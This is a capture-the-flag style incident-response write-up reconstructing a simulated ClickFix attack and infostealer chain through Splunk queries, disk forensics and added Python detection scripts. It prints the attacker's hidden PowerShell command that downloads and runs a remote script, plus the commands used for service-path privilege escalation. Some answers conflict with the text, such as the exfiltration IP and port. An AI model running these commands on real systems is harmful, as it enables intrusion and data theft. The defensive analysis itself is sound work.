
ClickFix VodkaStealer

Ahmad Massad
A curious mind exploring the world of cybersecurity through threat hunting, malware analysis, and digital forensics. Sharing my investigations, discoveries, and lessons learned along the way.

Scenario

NextGen Financial Solutions’ SOC flagged anomalous PowerShell activity on an employee workstation during routine monitoring. Triage traced it back to a legitimate external site that had been compromised with a ClickFix overlay: a fake CAPTCHA prompt that silently copies a malicious command to the victim’s clipboard and instructs them to paste it into the Windows Run dialog.

By the time IR got involved, the attacker had already escalated privileges, moved laterally across the network, and dropped a custom infostealer (“VodkaStealer”) on multiple endpoints. Browser credentials, crypto wallet files, and internal documents all appear to have been collected, staged, and exfiltrated to an external server.

Working from Splunk log data across all affected hosts plus disk images, the goal is to rebuild the full attack chain, identify which systems and accounts were touched, and scope the breach.


Initial Triage

First, how many hosts are in scope, and how much activity does each one have?

| metadata type=hosts index=*
| table host, firstTime, lastTime, totalCount
| convert ctime(firstTime) ctime(lastTime)

That gives us the four hosts in scope:

BCHAIN-WS-11
COMP-FS-01
DC01
PAYOPS-WS-04

Since the SOC alert was about suspicious PowerShell from an employee workstation, the next step is finding where this actually started:

index=* (EventCode=4688 OR EventCode=1) (Image="*powershell.exe" OR Image="*pwsh.exe" OR NewProcessName="*powershell.exe")
| eval cmdline=coalesce(CommandLine, ProcessCommandLine)
| where match(cmdline, "(?i)(-enc|-encodedcommand|-e |-ec |bypass|-nop|-noprofile|-w hidden|-windowstyle hidden|downloadstring|downloadfile|invoke-expression|iex|frombase64string|net\.webclient|-noninteractive|hidden|reflectivepeinjection|invoke-mimikatz|invoke-shellcode)")
| table _time, host, User, cmdline, ParentImage
| sort -_time

This is a broad sweep for suspicious PowerShell command-line indicators with key fields pulled out per event.

A hit immediately stands out on PAYOPS-WS-04, user n.hesham, at 2026-04-20 23:26:21:

  • Process: powershell.exe
  • Command line:
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://3.122.229.6/payload.ps1')"
  • Parent process: C:\Windows\explorer.exe

The command line is the giveaway: -nop -w hidden suppresses the profile and the console window, and IEX(...DownloadString(...)) pulls a script and runs it straight from memory, so nothing is written to disk at this stage. The parent process explorer.exe is exactly what a launch from the Run dialog produces (explorer.exe hosts the Run box and the shell), which is what the ClickFix lure asks the victim to do; a user-initiated PowerShell carrying a download cradle is not something a payroll workstation should ever produce.

Building a timeline around this event (a few minutes before and after) shows what led up to it.

Looking at the event flow, the user had Chrome open immediately before this. At 23:26:20, chrome.exe creates a named pipe (Sysmon Event ID 17), confirming Chrome as the active browser at the time.

One second later at 23:26:21, the PowerShell command fires.

At the same timestamp (23:26:20), there is a registry write under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, the ClickFix fingerprint: Windows records every command entered into the Run dialog there, so the entry confirms the command was pasted into Run rather than typed into a console.

To identify the site that delivered the ClickFix lure, Chrome history was pulled directly from the disk image:

C:\Users\Administrator\Desktop\Start Here\Artifacts\Disk Images\PAYOPS-WS-04\uploads\auto\C%3A\Users\n.hesham\AppData\Local\Google\Chrome\User Data\Default\History

The same IP that served the ClickFix overlay also hosted payload.ps1: the attacker was running both the lure and the payload off the same server.
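The triage above rests on three artefacts lining up within a second or two: a RunMRU write, explorer.exe as the parent, and a PowerShell download cradle, all for the same user on the same host. The following script is an added example (not part of the original write-up) that performs that correlation over a handful of constructed Sysmon-style records; the timestamps, paths and command line are the ones quoted above, while the SID in the registry path and the pipe name are made up.

```python
"""Correlate the ClickFix fingerprint: a RunMRU write followed within seconds by
explorer.exe spawning a PowerShell download cradle for the same user and host.

Added example for this write-up, not code from the original analysis. The
events below are constructed Sysmon-style records (Event ID 1 process create,
13 registry value set, 17 pipe created); the SID and pipe name are invented.
"""
import re
from datetime import datetime, timedelta

# Run-dialog history. Windows stores each command entered into Win+R under this
# key (value data ends in "\1"), which is why a RunMRU write is the tell-tale.
RUNMRU_KEY = "\\microsoft\\windows\\currentversion\\explorer\\runmru\\"

# Download-cradle / evasion indicators, a subset of the SPL regex above.
CRADLE = re.compile(
    r"(?i)(downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string"
    r"|-nop\b|-w(?:indowstyle)?\s+hidden)")
URL = re.compile(r"https?://[^\s'\"()]+")


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def find_clickfix(events, window=timedelta(seconds=5)):
    """Return one hit per PowerShell cradle launched by explorer.exe that has a
    RunMRU write from the same host/user within `window` of it."""
    runmru = [e for e in events
              if e["EventID"] == 13 and RUNMRU_KEY in e["TargetObject"].lower()]
    hits = []
    for p in events:
        if p["EventID"] != 1:
            continue
        if not p["Image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
            continue
        if not p["ParentImage"].lower().endswith("\\explorer.exe"):
            continue
        if not CRADLE.search(p["CommandLine"]):
            continue
        t = _ts(p["UtcTime"])
        for r in runmru:
            same_actor = (r["Host"], r["User"]) == (p["Host"], p["User"])
            if same_actor and abs(_ts(r["UtcTime"]) - t) <= window:
                url = URL.search(p["CommandLine"])
                hits.append({
                    "host": p["Host"], "user": p["User"], "time": p["UtcTime"],
                    "url": url.group(0) if url else None,
                    # strip the "\1" suffix Windows appends to RunMRU entries
                    "run_entry": r["Details"].removesuffix("\\1"),
                })
    return hits


# Constructed sample events (fields mirror what Sysmon emits).
SAMPLE_EVENTS = [
    {"EventID": 17, "Host": "PAYOPS-WS-04", "User": "NEXTGEN\\n.hesham",
     "UtcTime": "2026-04-20 23:26:20",
     "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "PipeName": "\\mojo.constructed.pipe"},
    {"EventID": 13, "Host": "PAYOPS-WS-04", "User": "NEXTGEN\\n.hesham",
     "UtcTime": "2026-04-20 23:26:20", "Image": "C:\\Windows\\explorer.exe",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft"
                     "\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a",
     "Details": "powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient)"
                ".DownloadString('http://3.122.229.6/payload.ps1')\"\\1"},
    {"EventID": 1, "Host": "PAYOPS-WS-04", "User": "NEXTGEN\\n.hesham",
     "UtcTime": "2026-04-20 23:26:21",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\""
                    " -nop -w hidden -c \"IEX(New-Object Net.WebClient)"
                    ".DownloadString('http://3.122.229.6/payload.ps1')\""},
    # Benign: an admin opens a console from the Start menu. Same parent, but no
    # cradle and no RunMRU write, so it must not fire.
    {"EventID": 1, "Host": "DC01", "User": "NEXTGEN\\Administrator",
     "UtcTime": "2026-04-20 23:30:00",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\""},
]

if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_EVENTS):
        print(hit)
```

Requiring the RunMRU write in the same window is what separates a ClickFix paste from an administrator who opened a console and typed a download cradle by hand; drop that requirement and the rule degrades to the broad sweep used for triage.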


Initial Access

Q1 The user visited a legitimate website that had been compromised with a ClickFix CAPTCHA overlay. What is the IP address of this website?

Identified during triage.

Answer: 3.122.229.6


Execution

Q1 After interacting with the fake CAPTCHA, a PowerShell command was copied to the user’s clipboard and executed via the Run dialog. What is the name of the payload file this command downloads?

Visible in the command line pulled during triage.

Answer: payload.ps1


Command and Control: Initial Beacon

Q1 The initial payload established a command-and-control channel. What is the IP address of the C2 server?

Sysmon Event ID 3 (network connection) for the PowerShell process shows an outbound connection approximately 8 seconds after execution, likely a sleep timer baked into the script.

index=* host="PAYOPS-WS-04" User="NEXTGEN\n.hesham" source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" EventID=3

Answer: 100.52.249.75 (port 443)


Discovery

Q1 To find a privilege escalation vector, the attacker enumerated all Windows services and their properties. What is the WMI command used to retrieve service names, executable paths, and start modes?

Six minutes after the C2 connection (23:33:18), PowerShell spawns cmd.exe and runs a WMI service dump filtered to anything matching “DataSync”, indicating the attacker was already hunting a specific target service rather than reviewing the full list.

C:\Windows\system32\cmd.exe /C wmic service get name,pathname,startmode | findstr /i "DataSync"

Answer: wmic service get name,pathname,startmode


Privilege Escalation

Q1 The attacker exploited an unquoted service path vulnerability. What is the name of the service they exploited?

Pivoting on “DataSync” with Sysmon Event ID 11 (FileCreate), three minutes after the enumeration (23:36:15), PowerShell drops a binary directly into the vulnerable service’s directory:

C:\Program Files\DataSync Pro\Service.exe

index=* host="PAYOPS-WS-04" User="NEXTGEN\n.hesham" "DataSync" EventID=11

Sysmon Event ID 29 (FileExecutableDetected) confirms the dropped file is a new PE.

38 seconds later, the service is stopped:

C:\Windows\system32\cmd.exe /C sc stop DataSyncPro

4 minutes later at 23:40:18, the dropped binary is renamed:

C:\Windows\system32\cmd.exe /C move "C:\Program Files\DataSync Pro\Service.exe" "C:\Program Files\DataSync Pro\Sync.exe"

At 23:41:23, the machine is rebooted, forcing the service to start again. Because the DataSyncPro ImagePath is not quoted, the Service Control Manager tries each space-delimited prefix of the path as an executable before it reaches the real binary, and the attacker’s Sync.exe in C:\Program Files\DataSync Pro\ is picked up and run as SYSTEM:

C:\Windows\system32\cmd.exe /C shutdown /r /t 5 /f

The rename from Service.exe to Sync.exe is what makes this work: the planted file has to sit exactly where one of the truncated paths points, so the service’s real ImagePath must continue past “Sync” with a space (a deeper “Sync <something>\...” path). The write-up does not show that value; confirm it on the host with sc qc DataSyncPro or from HKLM\SYSTEM\CurrentControlSet\Services\DataSyncPro\ImagePath.

Answer: DataSyncPro

Q2 To hijack the service execution flow, the attacker placed a malicious binary in a specific directory. What is the name of this malicious executable?

Answer: Sync.exe
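To make the search order concrete, here is an added example (not code from the original write-up) that reproduces how CreateProcess resolves an unquoted service path, checks whether a planted file lands on that path, and produces the quoted fix. The DataSyncPro ImagePath used in it is an assumption chosen so that the planted Sync.exe is on the search path; the page does not show the real value.

```python
"""Reproduce how the Service Control Manager resolves an unquoted ImagePath, to
show why a binary planted at C:\Program Files\DataSync Pro\Sync.exe can run as
SYSTEM at the next service start.

Added example, not from the original write-up. The sample ImagePath is an
assumption (the page does not show DataSyncPro's real path). CreateProcess,
given an unquoted command line, tries each space-delimited prefix with .exe
appended, in order, until one exists, before reaching the intended binary.
"""
import ntpath

EXE_EXTS = (".exe", ".com")


def split_image_path(image_path):
    """Split an unquoted ImagePath into (executable, arguments). The executable
    ends at the first space-delimited token with an executable extension."""
    tokens = image_path.strip().split(" ")
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(EXE_EXTS):
            return " ".join(tokens[:i + 1]), " ".join(tokens[i + 1:])
    return image_path.strip(), ""


def hijack_candidates(image_path):
    """Paths CreateProcess tries before the real binary, in order. Quoted paths
    and paths without spaces yield an empty list: nothing to hijack."""
    if image_path.strip().startswith('"'):
        return []
    exe, _args = split_image_path(image_path)
    tokens = exe.split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]


def planted_binary_wins(image_path, planted):
    """True if a file at `planted` would be executed instead of the service."""
    wanted = ntpath.normcase(planted)
    return any(ntpath.normcase(c) == wanted for c in hijack_candidates(image_path))


def quote_image_path(image_path):
    """The fix: wrap the executable in quotes and leave the arguments alone."""
    if image_path.strip().startswith('"'):
        return image_path.strip()
    exe, args = split_image_path(image_path)
    return f'"{exe}"' + (f" {args}" if args else "")


if __name__ == "__main__":
    # Assumed ImagePath for DataSyncPro; not taken from the page.
    image = r"C:\Program Files\DataSync Pro\Sync Service\DataSyncSvc.exe"
    for cand in hijack_candidates(image):
        print("SCM tries:", cand)
    print("Sync.exe wins:", planted_binary_wins(image, r"C:\Program Files\DataSync Pro\Sync.exe"))
    print("Service.exe wins:", planted_binary_wins(image, r"C:\Program Files\DataSync Pro\Service.exe"))
    print("remediated:", quote_image_path(image))
```

Run against the assumed path, the candidates are C:\Program.exe, C:\Program Files\DataSync.exe and C:\Program Files\DataSync Pro\Sync.exe; the file as originally dropped (Service.exe) is on none of them, which is why the attacker renamed it before rebooting. The same function, fed the output of wmic service get name,pathname,startmode or sc qc, is a quick audit for every service on a host: any candidate whose parent directory is writable by a standard user is a privilege escalation waiting to happen.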


Command and Control: SYSTEM Beacon

Q1 After successfully escalating privileges, a new process began beaconing to the C2 server as SYSTEM. What is the name of this process?

After the reboot, Sync.exe runs as SYSTEM. At 00:14:25 on the 21st, it spawns rundll32.exe with no arguments, which is unusual: rundll32.exe normally needs a DLL path and an export name to do anything. With nothing to load, it serves as a hollow host process, most likely for injected shellcode, consistent with the injection pattern seen elsewhere in this chain.

Network activity for that rundll32.exe instance (PID 3904) confirms it is beaconing:

index=* host="PAYOPS-WS-04" EventID=3 user=SYSTEM source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" process_id=3904

Answer: rundll32.exe


Credential Access

Q1 At what time did the attacker first obtain full access to LSASS for credential dumping?

Searching Sysmon Event ID 10 (ProcessAccess) for handles to lsass.exe opened with GrantedAccess 0x1FFFFF (PROCESS_ALL_ACCESS). A credential dumper needs at least PROCESS_VM_READ plus a query right, so narrower masks such as 0x1010 or 0x1410 are equally telling; 0x1FFFFF is simply the loudest form:

index=* host="PAYOPS-WS-04" EventID=10 user=SYSTEM source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" TargetImage="C:\Windows\system32\lsass.exe" "0x1fffff"

Answer: 2026-04-21 00:16:52
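The Splunk search above matches the literal string 0x1fffff. The following is an added example (not from the original write-up) that decodes the GrantedAccess mask into named rights, flags any lsass.exe access that carries the rights a memory dumper needs, and returns the first full-access timestamp. The events are constructed Sysmon-style records; only the 00:16:52 value and the rundll32.exe/SYSTEM context come from the page.

```python
"""Decode Sysmon Event ID 10 GrantedAccess masks against lsass.exe and find
the first PROCESS_ALL_ACCESS handle, generalising the query above to the
narrower masks dumpers also use.

Added example, not from the original write-up. SAMPLE_EVENTS is constructed;
only the 00:16:52 full-access event mirrors the finding on the page.
"""

# Process-specific and standard rights (winnt.h). 0x4000 and 0x8000 are not
# defined as process rights, so they surface as leftover bits when decoding.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER", 0x00100000: "SYNCHRONIZE",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
VM_READ = 0x0010
QUERY_RIGHTS = 0x0400 | 0x1000   # QUERY_INFORMATION | QUERY_LIMITED_INFORMATION


def _mask(value):
    return int(value, 16) if isinstance(value, str) else value


def decode_mask(value):
    """Names of the rights set in a GrantedAccess value, plus any leftover bits."""
    mask = _mask(value)
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_RIGHTS)
    if leftover:
        names.append(f"0x{leftover:X} (undefined bits)")
    return names


def is_dump_capable(value):
    """MiniDumpWriteDump-style reads need VM_READ plus a query right
    (0x1010, 0x1410, 0x1438 and 0x1FFFFF all satisfy this)."""
    mask = _mask(value)
    return bool(mask & VM_READ) and bool(mask & QUERY_RIGHTS)


def lsass_access_events(events, require_dump_rights=True):
    """Event ID 10 records targeting lsass.exe, optionally only dump-capable ones."""
    out = []
    for e in events:
        if e["EventID"] != 10 or not e["TargetImage"].lower().endswith("\\lsass.exe"):
            continue
        if require_dump_rights and not is_dump_capable(e["GrantedAccess"]):
            continue
        out.append(e)
    return out


def first_full_access(events):
    """Earliest UtcTime at which lsass.exe was opened with PROCESS_ALL_ACCESS."""
    full = [e for e in lsass_access_events(events, require_dump_rights=False)
            if _mask(e["GrantedAccess"]) == PROCESS_ALL_ACCESS]
    return min((e["UtcTime"] for e in full), default=None)


# Constructed sample records in the shape Sysmon emits for Event ID 10.
LSASS = "C:\\Windows\\system32\\lsass.exe"
RUNDLL = "C:\\Windows\\System32\\rundll32.exe"
SAMPLE_EVENTS = [
    {"EventID": 10, "UtcTime": "2026-04-21 00:15:30", "User": "NT AUTHORITY\\SYSTEM",
     "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1000"},      # query-limited only: noise
    {"EventID": 10, "UtcTime": "2026-04-21 00:16:40", "User": "NT AUTHORITY\\SYSTEM",
     "SourceImage": RUNDLL, "TargetImage": LSASS, "GrantedAccess": "0x1010"},
    {"EventID": 10, "UtcTime": "2026-04-21 00:16:52", "User": "NT AUTHORITY\\SYSTEM",
     "SourceImage": RUNDLL, "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "UtcTime": "2026-04-21 00:17:05", "User": "NT AUTHORITY\\SYSTEM",
     "SourceImage": RUNDLL, "TargetImage": "C:\\Windows\\System32\\svchost.exe",
     "GrantedAccess": "0x1FFFFF"},    # full access, but not to lsass
]

if __name__ == "__main__":
    print("first PROCESS_ALL_ACCESS on lsass:", first_full_access(SAMPLE_EVENTS))
    for e in lsass_access_events(SAMPLE_EVENTS):
        print(e["UtcTime"], e["SourceImage"], decode_mask(e["GrantedAccess"]))
```

Hunting only for 0x1FFFFF finds the 00:16:52 handle but would miss the earlier, narrower 0x1010 open from the same process in the sample; checking for the VM_READ plus query combination catches both while still ignoring the query-limited opens that service hosts perform routinely.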

Tracking what rundll32.exe did after the credential access, using it as the parent process:

index=* host="PAYOPS-WS-04" EventID=1 user=SYSTEM source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" ParentImage="C:\Windows\System32\rundll32.exe"

Post-dump timeline:

Time      Action
00:18:41  Additional remote-shell payload dropped
00:23:56  Domain machine enumeration
00:26:45  Domain controller identification
00:27:00  Full domain computer object listing
00:27:37  Named pipe write 8bebcc2a1c9 (staging marker)
00:52:50  cptchbuild.bin renamed to svc_update.exe
00:53:06  Scheduled task created: NextGen\DataSync Update
00:53:24  Scheduled task executed immediately
01:20:05  vodkastealer_emulator.ps1 renamed to svc_update.ps1
01:20:32  Scheduled task updated to point at renamed script
01:37:33  svc_update.ps1 executed with explicit exfil parameters
01:38:00  Single ICMP ping to BCHAIN-WS-11, lateral movement preparation

Q2 After harvesting credentials, the attacker used a stolen account for pass-the-hash lateral movement. What was the username of that account?

Since the attacker was heading toward BCHAIN-WS-11 immediately after dumping LSASS, check that host for network (type 3) logons from PAYOPS-WS-04 (10.10.11.252) that authenticated with NTLM rather than Kerberos; in a domain where Kerberos is the norm, an NTLM type 3 logon from a freshly compromised host is the usual pass-the-hash signature:

index=* host=BCHAIN-WS-11 EventID=4624 src_ip="10.10.11.252" Logon_Type=3 AuthenticationPackageName=NTLM

Answer: visible in the Account_Name field of the result above.


Lateral Movement

Q1 The attacker used the compromised domain admin’s credentials to move laterally to a file server. What is the IP address of this server?

Network connections (Sysmon Event ID 3) from the rundll32.exe beacon on PAYOPS-WS-04 reveal the connection to the file server:

index=* host=PAYOPS-WS-04 Image="C:\Windows\System32\rundll32.exe" EventID=3

Answer: 10.10.11.81

Q2 A common lateral movement technique involves creating a temporary service on the target machine. What is the name of the service binary created on the file server?

At 00:30:45, the attacker installs a service on the file server (System log Event ID 7045, a new service was installed) whose image path is \\10.10.11.81\ADMIN$\2fdb156.exe: a binary copied over the ADMIN$ share and run as a throwaway service, the PsExec-style remote execution pattern:

index=* host=COMP-FS-01 EventCode=7045

Answer: 2fdb156.exe


Persistence

Q1 To maintain access, the attacker created a scheduled task on all compromised machines. What is the full path of this scheduled task?

Answer: \NextGen\DataSync Update

Q2 The scheduled task was configured to execute a script. What is the filename of this script?

Answer: svc_update.ps1


Collection

Q1 The malicious script forcefully terminates browser processes to unlock their data files. What are the two browser processes it targets?

index=* host=PAYOPS-WS-04 Image="C:\Windows\System32\taskkill.exe" ParentCommandLine="powershell -nop -ep bypass -File C:\ProgramData\svc_update.ps1 -SkipChecks -ExfilPort 4444 -Verbose"

Answer: opera.exe, msedge.exe

Q2 The attacker creates a staging directory to store collected data before exfiltration. What is the full name of the staging directory created during the first execution?

PowerShell Script Block Logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) was used to recover the script content:

index=* host=PAYOPS-WS-04 EventCode=4104 source="WinEventLog:Microsoft-Windows-PowerShell/Operational" "svc_update.ps1"

The script constructs the directory name as %TEMP%\sysinfo_<CountryCode>_<PublicIP>_<datetime>. The country code, public IP and timestamp are resolved at run time, so the exact name cannot be read from the script itself. To recover the value from the first execution, the NTFS change journal ($UsnJrnl:$J) from the disk image was parsed with MFTECmd, which records every file and directory creation by name and time (--csv names the output directory, --csvf the file name):

MFTECmd.exe -f "C:\Users\Administrator\Desktop\Start Here\Artifacts\Disk Images\PAYOPS-WS-04\uploads\ntfs\%5C%5C.%5CC%3A\$Extend\$UsnJrnl%3A$J" --csv . --csvf sysinfo.csv

Answer: sysinfo_US_10.0.0.1_210420260133
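Once the $J export exists, the remaining work is picking out the directory creation that matches the stealer’s naming scheme and taking the earliest one. The script below is an added example (not from the original write-up) that does that over a constructed CSV laid out like MFTECmd’s $J output; the column names Name, ParentPath, UpdateTimestamp, UpdateReasons and FileAttributes are assumed, the real export has more columns, and only the directory name sysinfo_US_10.0.0.1_210420260133 comes from the page.

```python
"""Recover the stealer's staging directory from an MFTECmd $UsnJrnl:$J export.

Added example, not from the original write-up. SAMPLE_J_CSV is constructed in
the shape of MFTECmd's $J CSV; the column set is an assumption (the real file
has more columns) and the rows other than the 01:33 directory are invented.
"""
import csv
import io
import re

# %TEMP%\sysinfo_<CountryCode>_<PublicIP>_<datetime>, as built by svc_update.ps1
STAGING = re.compile(
    r"^sysinfo_(?P<cc>[A-Z]{2})_(?P<ip>\d{1,3}(?:\.\d{1,3}){3})_(?P<ts>\d{12})$")

SAMPLE_J_CSV = r"""Name,ParentPath,UpdateTimestamp,UpdateReasons,FileAttributes
svc_update.ps1,.\ProgramData,2026-04-21 01:20:05.1234567,RenameNewName,Archive
sysinfo_US_10.0.0.1_210420260133,.\Users\n.hesham\AppData\Local\Temp,2026-04-21 01:33:02.0481234,FileCreate,Directory
Login Data,.\Users\n.hesham\AppData\Local\Temp\sysinfo_US_10.0.0.1_210420260133,2026-04-21 01:33:05.1100000,FileCreate|DataExtend|Close,Archive
sysinfo_US_10.0.0.1_210420260133,.\Users\n.hesham\AppData\Local\Temp,2026-04-21 01:38:30.0000000,FileDelete|Close,Directory
sysinfo_US_10.0.0.1_210420260141,.\Users\n.hesham\AppData\Local\Temp,2026-04-21 01:41:10.5000000,FileCreate,Directory
"""


def parse_staging_name(name):
    """Split a staging directory name into its parts, or None if it does not match."""
    m = STAGING.match(name)
    return m.groupdict() if m else None


def staging_dir_creations(csv_text):
    """(timestamp, name, parts) for every directory-creation record whose name
    matches the stealer's scheme, oldest first. Deletions and the files written
    inside the directory are ignored."""
    rows = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        parts = parse_staging_name(row["Name"])
        if not parts:
            continue
        if "Directory" not in row["FileAttributes"]:
            continue
        if "FileCreate" not in row["UpdateReasons"].split("|"):
            continue
        # keep "YYYY-MM-DD HH:MM:SS", dropping the 100 ns fraction
        rows.append((row["UpdateTimestamp"][:19], row["Name"], parts))
    return sorted(rows)


def first_staging_dir(csv_text):
    """Name of the staging directory created by the first execution."""
    rows = staging_dir_creations(csv_text)
    return rows[0][1] if rows else None


if __name__ == "__main__":
    for ts, name, parts in staging_dir_creations(SAMPLE_J_CSV):
        print(ts, name, parts)
    print("first execution:", first_staging_dir(SAMPLE_J_CSV))
```

Matching on UpdateReasons and FileAttributes rather than on the name alone matters: the same name appears again when the directory is deleted after exfiltration, and each file the stealer drops inside it carries the directory in ParentPath, so a plain grep for sysinfo_ returns several rows per run and the earliest of them is not necessarily the creation.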


Exfiltration

Q1 The attacker exfiltrated the stolen data to an external server. What is the IP address of the exfiltration server?

Visible in the svc_update.ps1 execution parameters recovered above.

Answer: 165.245.213.184

Q2 The attacker exfiltrated data from a second workstation using a different port. What was the destination port for this exfiltration?

index=* host=BCHAIN-WS-11 EventCode=1 parent_process_exec="powershell.exe"

Answer: 4444


Defense Evasion

Q1 After moving laterally, the attacker attempted to clean up their tools on the file server. At what time was the lateral movement service binary deleted?

index=* host=COMP-FS-01 EventCode=23 "2fdb156"

Sysmon Event ID 23 (FileDelete) on the file server, filtered on the service binary name.

Answer: 00:30:47, two seconds after the service was installed at 00:30:45; the binary is removed as soon as it has run, consistent with a remote-execution tool that deletes its own service binary.


Impact

Q1 By recovering the v2 svc_update.ps1 stealer code, how many execution phases are defined in the script?

Recovered via the same Script Block Logging query as above.

index=* host=PAYOPS-WS-04 EventCode=4104 source="WinEventLog:Microsoft-Windows-PowerShell/Operational" "svc_update.ps1"

Answer: 6